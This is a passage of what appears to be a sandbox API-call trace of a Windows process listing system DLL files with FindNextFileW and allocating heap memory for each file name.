(HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x701e68 [0030.635] FindNextFileW (in: hFindFile=0x700c88, lpFindFileData=0x700a30 | out: lpFindFileData=0x700a30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf919a2c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xbf919a2c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xacf3bdc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OEMHelpIns.dll", cAlternateFileName="")) returned 0 [0030.635] FindClose (in: hFindFile=0x700c88 | out: hFindFile=0x700c88) returned 1 [0030.635] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x700a30 | out: hHeap=0x6d0000) returned 1 [0030.635] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b0c6f80, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9b0c6f80, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9b0ed0e0, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x9c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="advapi32.dll", cAlternateFileName="")) returned 1 [0030.635] lstrlenW (lpString="advapi32.dll") returned 12 [0030.635] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x701f38 [0030.635] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0777c0d, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xa0777c0d, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7de49f40, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="advpack.dll", cAlternateFileName="")) returned 1 [0030.635] lstrlenW (lpString="advpack.dll") returned 11 [0030.635] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x701fe0 [0030.635] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e862c71, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x5e862c71, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x7de71040, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aecache.dll", cAlternateFileName="")) returned 1 [0030.635] lstrlenW (lpString="aecache.dll") returned 11 [0030.635] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x702080 [0030.635] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c6f412, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x79c6f412, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0xf1f20320, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aeevts.dll", cAlternateFileName="")) returned 1 [0030.635] lstrlenW (lpString="aeevts.dll") returned 10 [0030.635] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x702120 [0030.635] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2994413f, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x2994413f, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7e0609f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AltTab.dll", cAlternateFileName="")) returned 1 [0030.636] lstrlenW (lpString="AltTab.dll") returned 10 [0030.636] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x7021c0 [0030.636] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74a8a79f, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0x74a8a79f, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x74803050, ftLastWriteTime.dwHighDateTime=0x1ca03fd, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="amcompat.tlb", cAlternateFileName="")) returned 1 [0030.636] lstrlenW (lpString="amcompat.tlb") returned 12 [0030.636] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a29ac8e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a29ac8e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a29ac8e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="amstream.dll", cAlternateFileName="")) returned 1 [0030.636] lstrlenW (lpString="amstream.dll") returned 12 [0030.636] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x702260 [0030.636] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76fcd8be, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x76fcd8be, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e0853e0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="amxread.dll", cAlternateFileName="")) returned 1 [0030.636] lstrlenW (lpString="amxread.dll") returned 11 [0030.636] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x702308 [0030.636] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41bceeb, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xd41bceeb, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e4d7330, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a8c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apds.dll", cAlternateFileName="")) returned 1 [0030.639] lstrlenW (lpString="apds.dll") returned 8 [0030.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x92) returned 0x7023a8 [0030.640] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf21dc5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf21dc5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-console-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.640] lstrlenW (lpString="api-ms-win-core-console-l1-1-0.dll") returned 34 [0030.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc6) returned 0x702448 [0030.640] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cefbc66, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cefbc66, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-datetime-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.640] lstrlenW (lpString="api-ms-win-core-datetime-l1-1-0.dll") returned 35 [0030.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc8) returned 0x702518 [0030.640] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cd32bf2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cd32bf2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-debug-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.640] lstrlenW (lpString="api-ms-win-core-debug-l1-1-0.dll") returned 32 [0030.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc2) returned 0x7025e8 [0030.640] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-delayload-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.640] lstrlenW (lpString="api-ms-win-core-delayload-l1-1-0.dll") returned 36 [0030.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xca) returned 0x7026b8 [0030.640] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2ccc07d5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2ccc07d5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-errorhandling-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.640] lstrlenW (lpString="api-ms-win-core-errorhandling-l1-1-0.dll") returned 40 [0030.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x702790 [0030.641] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cd7eeb0, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cd7eeb0, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-fibers-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.641] lstrlenW (lpString="api-ms-win-core-fibers-l1-1-0.dll") returned 33 [0030.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x702870 [0030.641] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.641] lstrlenW (lpString="api-ms-win-core-file-l1-1-0.dll") returned 31 [0030.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x702940 [0030.641] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8c9b158, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="")) returned 1 [0030.641] lstrlenW (lpString="api-ms-win-core-file-l1-2-0.dll") returned 31 [0030.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x702a08 [0030.641] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb859c590, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb859c590, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8c9b158, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="")) returned 1 [0030.641] lstrlenW (lpString="api-ms-win-core-file-l2-1-0.dll") returned 31 [0030.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x702ad0 [0030.641] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cfe04a0, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cfe04a0, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-handle-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.641] lstrlenW (lpString="api-ms-win-core-handle-l1-1-0.dll") returned 33 [0030.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x702b98 [0030.641] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0c4cda, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0c4cda, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-heap-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.641] lstrlenW (lpString="api-ms-win-core-heap-l1-1-0.dll") returned 31 [0030.642] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x702c68 [0030.642] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d078a1c, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d078a1c, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-interlocked-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.642] lstrlenW (lpString="api-ms-win-core-interlocked-l1-1-0.dll") returned 38 [0030.642] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xce) returned 0x702d30 [0030.642] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cce6934, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cce6934, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-io-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.642] lstrlenW (lpString="api-ms-win-core-io-l1-1-0.dll") returned 29 [0030.642] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbc) returned 0x702e08 [0030.642] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-libraryloader-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.642] lstrlenW (lpString="api-ms-win-core-libraryloader-l1-1-0.dll") returned 40 [0030.642] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x702ed0 [0030.642] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cce6934, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cce6934, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localization-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.642] lstrlenW (lpString="api-ms-win-core-localization-l1-1-0.dll") returned 39 [0030.643] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x700a30 [0030.643] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb85502d0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb85502d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="")) returned 1 [0030.643] lstrlenW (lpString="api-ms-win-core-localization-l1-2-0.dll") returned 39 [0030.643] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x700b08 [0030.643] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localregistry-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.643] lstrlenW (lpString="api-ms-win-core-localregistry-l1-1-0.dll") returned 40 [0030.643] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x700be0 [0030.643] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0eae39, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0eae39, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-memory-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.643] lstrlenW (lpString="api-ms-win-core-memory-l1-1-0.dll") returned 33 [0030.643] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x700cc0 [0030.643] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1833b5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1833b5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-misc-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.643] lstrlenW (lpString="api-ms-win-core-misc-l1-1-0.dll") returned 31 [0030.643] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x700d90 [0030.643] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-namedpipe-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.643] lstrlenW (lpString="api-ms-win-core-namedpipe-l1-1-0.dll") returned 36 [0030.643] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xca) returned 0x700e58 [0030.644] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processenvironment-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.644] lstrlenW (lpString="api-ms-win-core-processenvironment-l1-1-0.dll") returned 45 [0030.644] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xdc) returned 0x700f30 [0030.644] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processthreads-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.644] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-0.dll") returned 41 [0030.644] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd4) returned 0x701018 [0030.644] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="")) returned 1 [0030.644] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-1.dll") returned 41 [0030.644] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd4) returned 0x7010f8 [0030.644] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1370f7, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1370f7, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-profile-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.645] lstrlenW (lpString="api-ms-win-core-profile-l1-1-0.dll") returned 34 [0030.645] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc6) returned 0x7011d8 [0030.645] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0c4cda, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0c4cda, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-rtlsupport-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.645] lstrlenW (lpString="api-ms-win-core-rtlsupport-l1-1-0.dll") returned 37 [0030.645] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xcc) returned 0x702fc8 [0030.645] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1cf673, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1cf673, ftLastAccessTime.dwHighDateTime=0x1ca040f, 